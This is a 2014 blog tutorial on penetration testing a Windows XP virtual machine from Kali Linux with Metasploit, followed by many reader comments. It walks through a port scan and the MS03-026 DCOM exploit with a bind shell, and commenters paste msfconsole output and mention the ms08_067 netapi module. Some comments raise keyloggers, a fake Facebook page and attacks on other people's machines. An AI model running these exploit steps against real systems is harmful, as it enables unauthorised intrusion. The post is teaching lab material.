Friday, February 14, 2014

Penetration Testing - Hacking XP

Our approach to penetration testing is going to be simple. I already made a post about the ideal way to begin penetration testing. But we aren't going to ideal way. I'm gonna teach you penetration testing the way I learnt it. By doing actual penetration and exploitation. We can't hack completely patched Windows 7 or Windows 8 right in the first tutorial, but we can definitely hack an unpatched Windows XP machine. However, to do that, you need to victim machine. Testing this method on someone else's computer is not recommended and is quite illegal. It is strongly advised to create your own virtual machine and test exploits there.

What are you going to need

Knowledge

  • Basic Penetration testing terms (I recommend that you take a look here, as I'm going to use the terms freely without any explanation here in this tutorial)
  • The tough manual way of penetration testing (A large patch of advanced material which will help you become a great pentester if you have the patience to read it all and capability to understand it)
  • VMWare tools (Without Vmware tools there is no way you can have a Kali linux (attacker machine) and unpatched XP (target machine) running at the same time in one single computer)

Virtual Machines

  • Kali linux ( Click the link for a complete detailed guide)
  • Windows XP (After you've followed the tutorial above for installing Kali linux, installing XP on a VM will be a piece of cake, a few screenshots of the process)



Now there is catch in Windows XP. While Kali linux is free, Windows XP is not. So you have to buy one (won't promote piracy here). Just make sure that when you are buying a Windows XP cd, it is unpatched and SP1. If it is patched then the exploits won't work. Your best bet would be to look up your shelves to find an old XP cd that you bought years ago which is catching dust, and put it to some use.

A look at Metasploit Framework

Starting the framework

"In keeping with the Kali Linux Network Services Policy, there are no network services, including database services, running on boot so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support." Simply speaking, there are some services that metasploit needs which aren't started with system startup. So here's some commands you need to execute on your console before you can start metasploit
service postgresql start
(Metasploit uses PostgreSQL as its database so it needs to be launched first.)

With PostgreSQL up and running, we next need to launch the metasploit service. The first time the service is launched, it will create a msf3 database user and a database called msf3. The service will also launch the Metasploit RPC and Web servers it requires.
service metasploit start
Now finally we are ready to start metasploit framework.
msfconsole

Looking at the targets

Right now, my metasploit framework is running on Kali on Vmware on a Windows 8 machine. Also, there is a Windows XP Sp3 virtual machine running side my side with my Kali. So what we need to do is detect these machines in Metasploit framework. For this we'll do a port scan.

Port Scan

Metasploit offers an awesome port scanning function which goes by the name auxiliary scanner. Here is the command to execute this scan
To use this feature, enter the following code-
use auxiliary/scanner/portscan/tcp
Type show options to see the available options
show options
 Now we have to change a few settings, firstly, we should reduce the number of ports scanned
 set ports 1-500
Secondly, we have to specify a target IP to scan. Now this is a bit tricky, as the IP is not going to be the same in all cases. So here's what you'll do. Go to your XP virtual machine (the one you are trying to hack). Open command prompt and type
ipconfig
In the results, check the IP of the machine. This is what you'll have to specify the RHOSTS option as.
In my case the IP is 192.168.63.131
Now go back to your Kali machine, and type the fol (change the IP as required)
set RHOST 192.168.63.131
Here's what it should look like


There's a slight error here, I spelled RHOSTS wrong. Make sure you add the 's' in the end.
Now we are ready for some action, do a show options again to see what all changes you've made. Finally, type-
run
The scan will start and after some time it will show you which tcp ports are open and vulnerable to attack.
If you had not been using an unpatched version of Windows, there will not be any vulnerable ports.
This basically means that there are no open ports here. Nothing much you can do. However if you had some good luck there, and had a vulnerable machine, you will have some vulnerable ports. In my case, I turned off the firewall on the windows machine and run the auxiliary module again.
I got 3 open ports this time. If you are using some higher XP version, you too might need to disable firewall in order to get open ports.
Now we know we have a target at IP 192.168.63.131 and it has port 135 139 and 445 open.


Real life port scan

In actual pentesting environment, you don't know about the IP, open ports and OS of the target computer. In such cases, we can use Nmap port scanner which is much better than auxiliary. We'll come to that later.

Finding Exploits

This step is important. We need to figure out which exploits work on the OS we are attacking. In our case, we already know what to do. Type back to get out of auxiliary scanner. Search for dcom on msfconsole.
search dcom
This is a very famous exploit for Windows.
Copy the exploit number 3. (Which shows great as rank). In the next line, type
use exploit/windows/dcerpc/ms03_026_dcom
You are now using the most famous Windows exploit. Type show options again
show options
Again, set the RHOST as 192.168.63.131 (replace with the IP of your target)
set RHOST 192.168.63.131 
Also, set a payload.
set PAYLOAD windows/shell_bind_tcp

And here's the best part
exploit

You have now successfully broken into the target computer. You have an open shell on the target computer with administrator privileges. In short, you own that computer now. Try out what all you can do from here on. I'll come up with more in the next tutorial.
Update - The next tutorial is here. It discusses the post exploitation fun that you can have with the meterpreter payload.  Post exploitation fun in an exploited xp machine
We have a pentesting lab now and have successfully exploited an XP machine.

82 comments:

  1. Thanks for letting us know. The explanation of various type of virtual networking is really lucid and detailed.

    ReplyDelete
  2. If it is not clear enough, you have to substitute remote_host with the IP of your target XP machine, the one you were successfully pinging.

    ReplyDelete
  3. hello...:p i have a problem my ip that use for facebook fake page ..as adress thats not work on other computer but on my computer thats easly work why ?? am Using VM ........kali linux

    ReplyDelete
    Replies
    1. I don't understand your problem. Please elaborate, give more details. I don't see what is the use of Facebook fake page IP in this pentesting tutorial.

      Delete
    2. dude you are running your fake page under a local ip, you aren't forwarding the right ports probably.
      that and whatever you decide to run your fake FB page, you will need to buy the right domain which I am sure someone has already purchased.

      Delete
  4. I have kali-linux and win xp (unpatched) using VMware using NAT connections both communicate fine with each other (seemingly) I can find open ports on unpatched xp VMware using use auxiliary/scanner/portscan/tcp. But when i run exploit. nothing happens. no cmd box opens on xp. nothing at all. ive followed your instructions. i turned off automatic updates of xp after installation xpion finished. i also turned off firewall. im unsure why it has not worked. can you help

    ReplyDelete
    Replies
    1. same here. can you help please? -l doesn't work

      Delete
  5. [*] Sending exploit ...
    msf exploit(ms03_026_dcom) > run

    [*] Started bind handler
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.**.**[135] ...
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.**.***[135] ...
    [*] Sending exploit ...
    msf exploit(ms03_026_dcom) > -l
    [-] Unknown command: -l.
    msf exploit(ms03_026_dcom) > -l
    [-] Unknown command: -l.
    msf exploit(ms03_026_dcom) > sessions -i 1
    [-] Invalid session id
    msf exploit(ms03_026_dcom) > show options

    Module options (exploit/windows/dcerpc/ms03_026_dcom):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    RHOST 192.168.44.138 yes The target address
    RPORT 135 yes The target port


    Payload options (windows/shell_bind_tcp):

    Name Current Setting Required Description
    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
    LPORT 4444 yes The listen port
    RHOST 192.168.44.138 no The target address


    Exploit target:

    Id Name
    -- ----
    0 Windows NT SP3-6a/2000/XP/2003 Universal


    msf exploit(ms03_026_dcom) >

    ReplyDelete
    Replies
    1. Nothing wrong with the ping. And the netapi method works. I have cmd prompt now.

      Delete
    2. I've the same problem as this one.
      I've turned off my firewall and i can ping my XP from kali and vice versa.
      i've tried using both dcom and netapi, but in both cases i got stuck..
      in case of dcom i'm stuck at this point.
      [*] Sending exploit ...

      and in case of netapi i'm stuck at this point
      [*] Attempting to trigger the vulnerability...


      No error whatsoever.. Please Please Please help me...

      Delete
    3. Thanx but where can i get my hands on an unpatched windows xp.. i've searched but no success...

      Delete
    4. I'm not sure where to get it. I myself had a tough time getting one. Try downloading a XP SP1. It's likely to be unpatched.

      Delete
    5. instead of "exploit" put "check" tu review if is vurnebal

      Delete
  6. Hey, I tried to run this exploit and it seemed to work perfectly (I did have to disable the firewall on my XP) my only problem was at the very end, It didn't give me any errors but I dont get anything after the exploit has been used, I just get "msf exploit(ms03_026_dcom) >" after not the windows shell I expect, did I miss a step? I tried this 3 times restarting both machines twice. Could It be becuase I am using service pack two? I am able to ping them both.


    ~Firepyro

    ReplyDelete
    Replies
    1. Look at the comment above. The guy had the same problem. Using netapi instead of MS03 helped solve the issue. SP2 might not be vulnerable to MS03.

      Delete
    2. Oh, whoops I passed over that one xD Thanks for responding so quickly! Sorry for the dumb question.

      ~Firepyro

      Delete
    3. No its all right. Questions like these help others when they face similar issues.

      Delete
    4. I have the same problem.
      Could you please tell me what's the netapi method ?

      Delete
  7. Bit of an off topic question, I want to make some of this automatic, if I would use batch in windows what would be the Kali Equivalent?

    ReplyDelete
    Replies
    1. Thank you, this helped alot!

      Delete
  8. Turn off your firewall, disable your Antivirus (if any). Make sure the vulnerability is not already patched in your system.

    ReplyDelete
  9. from start to exploit it work perfect but my question is how can i access to victim pc files and how can i install some thing like keylogger please help me
    regards osama asghar :)

    ReplyDelete
    Replies
    1. and last thing that can we keylog google chrome meterpreter> keyscan_dump

      Delete
  10. Is there any way for me to check if my XP system has already been patched? I am feeling like this is the problem as I have already tried reverse_tcp as well as meterpreter. I found that my virtual network may not be configured the best that it can be...would you recommend a host only?

    ReplyDelete
  11. By the way, was your site format changed or something?

    ReplyDelete
  12. And yeah, I changed the design of my website. It has done more harm than good though, as my search rankings dropped overnight, and traffic dropped from 2K visits/day to 1K/day.

    ReplyDelete
  13. I really like the site as far as content goes. The new layout did throw me off, but that's no problem. I am fairly certain that the exploits will not work because I downloaded XP from Microsofts free VM files so it's likely patched to hell. I have been using Metasploitable 2 and its been pretty cool; I'm able to gain control over the command prompt using Armitage, but after messing with Armitage a little bit more, I don't see how someone would not be able to use it successfully with Metasploitable. I hope to see more tutorials on more recent operating systems soon!

    ReplyDelete
  14. The layout hasn't been appreciated by the visitors, nor by the search engine spiders. I think I'll change it.

    ReplyDelete
  15. Just letting ya know, I think the new layout is interesting, but it's hard for me as a beginner to really understand or see a linear layout of where to go from. That may be what mainly threw people off. At first I thought I was on the wrong site. lol

    ReplyDelete
  16. I have a copy of XP. Using VM or virtual box I would normally use an ISO image. Is there a way to convert my copy of XP to an ISO image ?

    ReplyDelete
    Replies
    1. It would be great if you could be more specific. What do you mean by 'having a copy of XP'. If you mean that you don't have the installation ISO, but the installed files on a system, then you can use vmware vcenter converter. Let me know more details of your situations so I can give a specific answer.

      Delete
  17. Sorry. I mean by copy, I have it on a disc, original Microsoft XP disc. Can I copy it to a format, i.e, ISO image.

    ReplyDelete
  18. Use daemon tools. They have an option to save the content from CD or DVD as an isolated file. I think alcohol 120 also provides the same functionality.

    ReplyDelete
    Replies
    1. Sorry autocorrect converted iso to isolated.

      Delete
    2. Any idea on this?
      After exploit command

      Started bind handler


      --- Exploit completed, bu no session was created


      ""msf exploit(ms03_026_dcom) > set RHOST 192.168.148.131
      RHOST => 192.168.148.131
      msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell_bind_tcp
      PAYLOAD => windows/shell_bind_tcp
      msf exploit(ms03_026_dcom) > exploit

      [*] Started bind handler
      [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
      [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
      [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
      [*] Sending exploit ...
      [*] Exploit completed, but no session was created.
      msf exploit(ms03_026_dcom) >
      ""

      Delete
  19. Thank you. It will be more practical converted to an ISO image. I can then store it on a usb with my many other ISO images of various operating systems.
    I think the appearance of your site is great. There is no such thing as perfect. I arrive and leave a little wiser, that in my book is a success and a site worth bookmarking. 10 out of 10.

    ReplyDelete
  20. there is something similar for windows 8

    ReplyDelete
  21. Need help I got all the way to exploiting , had to change the target port because 135 wouldn't work , but after all that it failed to bind. Help!!

    ReplyDelete
  22. My Both Xp & Kali Showing Same Ip adress please Help

    ReplyDelete
  23. perhaps u r usng vBox of oracle, thats why u have same ip on both machines........ same case was mine....so I started usng vm-ware

    ReplyDelete
    Replies
    1. I read the conversation...... same problem with me. Can't get into xp...... same as urs
      [*] Started bind handler
      [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
      [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
      [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
      [*] Sending exploit ...
      msf exploit(ms03_026_dcom) >

      I am again in msf rather than in cmd of xp...
      Did anyone figured it out?? pls do help

      Delete
    2. Ive the same problem, still dont understand it...

      Delete
  24. i hacked xp using windows/meterpreter/reverse_tcp but its working for virtual box only!!!!!!!!!

    When i am trying to hack my friend system (He Know It) its not connecting????

    stuck at [*] Starting the payload handler.....

    ReplyDelete
    Replies
    1. are you sure you are using his public ip instead of his home ip?
      and is it his ip or his isp's dns' ip or his real ip?

      Delete
  25. Thanks for the author. I finish this tutorial. For your information, I have some problems from installing Kali Linux which you post at --> http://kalitutorials.net/2014/02/complete-detailed-guide-on-installing.html
    If I follow your steps by steps, in step 14, the screen show 'Network autoconfiguration failed', and your advice is to choose 'Do not configure the network at this time', and that made the problems. You cannot ping to anywhere. The solution is easy, in step 8, in Network Adapter, select NAT, that's all. Hope this post will be useful for some guys :)

    ReplyDelete
  26. I am attempting the netapi exploit on a pirated windows 7 (not a VM) on SP1. After digging around through different payloads, meterpreter works the best, but it still failed. I had everything set, RPORT was 445 (neither 135 or 139 will work), RHOST was 10.0.0.15, LHOST was 10.0.0.16, and LPORT was 4444.
    Here's what happened:
    [*] Started reverse handler on 10.0.0.16:4444
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
    [*] We could not detect the language pack, defaulting to English
    [-] Exploit aborted due to failure: no-target: No matching target
    msf exploit(ms08_067_netapi) >

    Any help???

    ReplyDelete
    Replies
    1. You should try exploiting XP first. You're jumping way ahead of the tutorial.

      Delete
  27. Help , I've tried both the netapi and the dcom method but at the end the result is
    " Exploit failed: the following options failed to validate: RHOST.
    msf exploit(ms08_067_netapi) > " . Please help at the earliest !

    ReplyDelete
  28. Failed to start metasploit.service : Unit metasploit.service failed to load: no such file or directory.

    I get this error after giving the command "service metasploit start" , I have searched online for solution but found none, can you help me.

    ReplyDelete
    Replies
    1. the way to start metasploit has been changed. check this link:
      https://www.kali.org/news/kali-linux-20-released/

      # Start the Postgresql Database
      /etc/init.d/postgresql start

      # Initialize the Metasploit Framework Database
      msfdb init

      # Run msfconsole
      msfconsole

      Delete
  29. How would we do this manually? In this tutorial we let the tools do all the work, but how would I as a complete newbie at this do all of this manually/use as little tools as possible. I'd like to actually understand how it all works

    ReplyDelete
  30. Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (IP Address) What does this mean?

    ReplyDelete
  31. after "[*] sending exploit"... i am redirected to "msf exploit(ms03_026_dcom) > "

    why is that?

    ReplyDelete
  32. after "[*] sending exploit"... i am redirected to "msf exploit(ms03_026_dcom) > "

    why is that?

    ReplyDelete
  33. Exploit failed : Rex: : Porto: : dcerpc : : exception:: invalid packet invalid packet. DCERPC response packet is imcomplet


    What does this mean ? How do I fix it ?

    ReplyDelete
  34. same issue for me as well .redirected back to msf console insted of xp command window.
    Any help would be appreciated author

    ReplyDelete
  35. no use in hacking a XP workstation anyway, especially nowdays. Everybody use WIN7 or greater.

    ReplyDelete
  36. hello, when i run the exploit i get this:

    [*]Started bind handler
    [*]Trying target Windows NT SP#-6a/2000/XP/2003 Univesal...
    [*]Biding to "some numbers":0.0@ncacn_ip_tcp:"ip adress[port]"
    [-]Exploit failed: Rex::Proto::DCERPC::Exceptions::InvalidPacket invalid PAcket. DCERPC response packetis incomplete

    did i get something wrong??

    thx 4 the help

    ReplyDelete
  37. it says exploit completed, but no session was created. how do i fix this

    ReplyDelete
    Replies
    1. same here, both with tcp and netapi

      Delete
  38. LOL very new to this i got all the way without really reading the scan i have a really old XP Sp3 machine that i threw up. The scan came back with two open ports 445 and 139 not 135 like yours above so my exploit didn't work. Told me exploit failed i'm assuming because it likes port 135. I tried loading another module at windows/smb/ms04_0331_netdde and it keeps failing. Are there more modules to try? I did the com search command but it only came up with the ones you have.

    ReplyDelete
    Replies
    1. SP3 is patched and you need an unpatched version of XP

      Delete
  39. Hi all,
    I do not got the port step. why do we need to set the number of ports and not leave it as default and why we are not use them (we just have to make sure there are exist?).

    THX, Amit

    ReplyDelete
  40. can you do a tutorial on how to hack mac

    ReplyDelete
  41. I can't seem to be able to get any of the ports open. I have disabled the Windows Firewall and added exceptions for the ports you got open but nothing I do seems to work. Please suggest any ideas that could help me get a port open. I tried an Nmap scan and the first time I did it it said port 80 was open but when I scanned again it said it was filtered.

    ReplyDelete
    Replies
    1. I forgot to mention I have Windows XP Pro SP3.

      Delete
    2. Also, I don't know if this helps, but I'm running it on Windows XP Mode on a Windows 7 PC I have.

      Delete
  42. msf > use auxilary/scanner/portscan/tcp
    [-] Failed to load module: auxilary/scanner/portscan/tcp
    please help i'm stuck at this level

    ReplyDelete
  43. I would like to get remote access to a router which is 300 miles away, I have the password, MAC address, user name for the router, password for the router,IP address for the router, all the router settings I just don't know how to connect to it, Its my sisters router and she knows I am trying to do this with Kali Linux as to learn more about pen testing.
    Any help would be most appreciated.
    Thanks in advance.

    ReplyDelete
  44. I would like to get remote access to a router which is 300 miles away, I have the password, MAC address, user name for the router, password for the router,IP address for the router, all the router settings I just don't know how to connect to it, Its my sisters router and she knows I am trying to do this with Kali Linux as to learn more about pen testing.
    Any help would be most appreciated.
    Thanks in advance.


    THIS IS VERY INTERESTING QUE.. PLZ RESP AUTHOR.. REPLY APPRECIATED..

    ReplyDelete
  45. HI, Im new bie to metasploit. After i run this tutorial I get "exploit completed but no session was created"

    OS is Windows 7

    ReplyDelete
  46. when i start the exploit windows xp machine shuts down. i get the system shutdown window showing this error "windows must now restart because remote procedure call (RPC) service terminated unexpectedlly"

    ReplyDelete
  47. Any idea on this?
    After exploit command

    Started bind handler


    --- Exploit completed, bu no session was created


    ""msf exploit(ms03_026_dcom) > set RHOST 192.168.148.131
    RHOST => 192.168.148.131
    msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell_bind_tcp
    PAYLOAD => windows/shell_bind_tcp
    msf exploit(ms03_026_dcom) > exploit

    [*] Started bind handler
    [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
    [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
    [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.148.131[135] ...
    [*] Sending exploit ...
    [*] Exploit completed, but no session was created.
    msf exploit(ms03_026_dcom) >
    ""

    ReplyDelete
  48. I get this error when i hit exploit "Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out(remote host ip)"
    I have disabled the firewall on the xp virtual machine i tried to attack.I have also stoppe d the automatic updates.Can anyone help me?Thanks

    ReplyDelete
    Replies
    1. I should also say that the ip from the kali linux virtual machine is the same as the xp one.

      Delete
    2. The IPs should not be same. Maybe you are looking at the external IP, not the internal one.

      Delete
  49. So once I run the exploit it "works successfully" but I don't get any return for the opened shell. I type exploit, I get no error messages and it says the exploit worked but it just hangs after that with no possible command input.
    Any idea what I could have done wrong?

    ReplyDelete
    Replies
    1. Never mind. I just dicked with it and got it to work with NETAPI instead of DCOM.

      Delete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC